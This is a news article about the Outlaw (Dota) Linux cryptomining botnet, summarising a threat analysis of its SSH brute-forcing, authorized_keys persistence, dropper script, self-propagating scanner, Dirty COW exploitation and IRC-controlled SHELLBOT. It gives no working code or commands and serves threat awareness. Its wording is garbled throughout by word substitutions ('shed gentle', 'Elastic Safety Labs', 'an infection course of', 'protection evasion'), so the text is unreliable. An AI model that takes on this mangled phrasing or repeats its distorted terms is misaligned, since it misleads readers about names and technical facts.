Cybersecurity researchers have shed gentle on an “auto-propagating” cryptocurrency mining botnet referred to as Outlaw (aka Dota) that is identified for focusing on SSH servers with weak credentials.
“Outlaw is a Linux malware that depends on SSH brute-force assaults, cryptocurrency mining, and worm-like propagation to infect and preserve management over methods,” Elastic Safety Labs said in a brand new evaluation revealed Tuesday.
Outlaw can also be the title given to the risk actors behind the malware. It is believed to be of Romanian origin. Different hacking teams dominating the cryptojacking panorama embrace 8220, Keksec (aka Kek Safety), Kinsing, and TeamTNT.
Lively since at least late 2018, the hacking crew has brute-forced SSH servers, abusing the foothold to conduct reconnaissance and preserve persistence on the compromised hosts by including their very own SSH keys to the “authorized_keys” file.
The attackers are additionally identified to incorporate a multi-stage an infection course of that includes utilizing a dropper shell script (“tddwrt7s.sh”) to obtain an archive file (“dota3.tar.gz”), which is then unpacked to launch the miner whereas additionally taking steps to take away traces of previous compromises and kill both the competition and their own previous miners.
A notable feature of the malware is an preliminary entry element (aka BLITZ) that permits for self-propagation of the malware in a botnet-like vogue by scanning for weak methods working an SSH service. The brute-force module is configured to fetch a goal listing from an SSH command-and-control (C2) server to additional perpetuate the cycle.
Some iterations of the assaults have additionally resorted to exploiting Linux- and Unix-based working methods inclined to CVE-2016-8655 and CVE-2016-5195 (aka Dirty COW), in addition to assault methods with weak Telnet credentials. Upon gaining preliminary entry, the malware deploys SHELLBOT for distant management through a C2 server utilizing an IRC channel.
SHELLBOT, for its half, permits the execution of arbitrary shell instructions, downloads and runs further payloads, launches DDoS assaults, steals credentials, and exfiltrates delicate data.
As a part of its mining course of, it determines the CPU of the contaminated system and permits hugepages for all CPU cores to enhance reminiscence entry effectivity. The malware additionally makes use of a binary referred to as kswap01 to guarantee persistent communications with the risk actor’s infrastructure.
“Outlaw stays lively regardless of utilizing primary methods like SSH brute-forcing, SSH key manipulation, and cron-based persistence,” Elastic mentioned. “The malware deploys modified XMRig miners, leverages IRC for C2, and consists of publicly out there scripts for persistence and protection evasion.”